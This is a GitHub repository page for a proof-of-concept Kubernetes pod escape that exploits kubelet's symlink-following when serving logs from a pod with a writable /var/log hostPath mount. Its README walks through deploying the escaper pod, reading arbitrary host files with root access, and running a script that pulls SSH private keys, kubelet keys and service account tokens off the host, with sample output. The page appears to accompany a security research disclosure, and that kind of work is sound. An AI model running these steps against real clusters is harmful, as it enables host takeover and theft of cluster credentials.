Skip to content

Kubernetes POC for utilizing write mount to /var/log for getting a root on the host

Notifications You must be signed in to change notification settings

mciocan/kube-pod-escape

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Kubelet Exploit For /var/log Mount

Kube-pod-escape is a POC for an exploit on the symlink following behaviour of logs files serving in the kubelet, in addition with a pod that has a write hostPath mount to /var/log.
This POC shows the outcome of a pod which uses that mount, and how it can escape to the host machine.
Further read on this discovery can be done on the following blog post

asciicast This repository contains all files and related code for running this exploit.

Prerequisites

A Kubernetes cluster, Without restriction for retrieving logs with kubectl logs <pod>

Run the exploit

First, create the pod by:

$ kubectl create -f escaper.yml
pod "escaper" created

After the pod was created, exec into the escaper pod.

$ kubectl exec -it escaper bash
➜ root@escaper:~/exploit$ lsh
Usage: [cath|lsh] <host_path>

lsh

Works like ls, but using root access on the host machine.

cath

Works like cat, but using root access on the host machine.

Example:

$ kubectl exec -it escaper bash
➜ root@escaper:~/exploit$ lsh /proc
1/
10/
10034/
10042/
10047/
....

Extract Sensitive Data

In addition to the given lsh and cath commands, Inside the ~/exploit folder, there's a python script, which automatically locates and downloads private key files from the host, as well as kubernetes service account tokens.
(to find tokens, the script searches the /var/lib/kubelet/pods folder. this way it can read the mounted .token files for each pod that runs on the host)

Run the script

$ kubectl exec -it escaper bash
➜ root@escaper:~/exploit$ python find_sensitive_files.py
[*] Got access to kubelet /logs endpoint
[+] creating symlink to host root folder inside /var/log

[*] fetching token files from host
[+] extracted hostfile: /var/lib/kubelet/pods/6d67bed2-abe3-11e9-9888-42010a8e020e/volumes/kubernetes.io~secret/metadata-agent-token-xjfh9/token

[*] fetching private key files from host
[+] extracted hostfile: /home/ubuntu/.ssh/private.key
[+] extracted hostfile: /etc/srv/kubernetes/pki/kubelet.key
...

Token Files are downloaded to: /root/exploit/host_files/tokens
Key Files are downloaded to: /root/exploit/host_files/private_keys

About

Kubernetes POC for utilizing write mount to /var/log for getting a root on the host

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 91.7%
  • Dockerfile 8.3%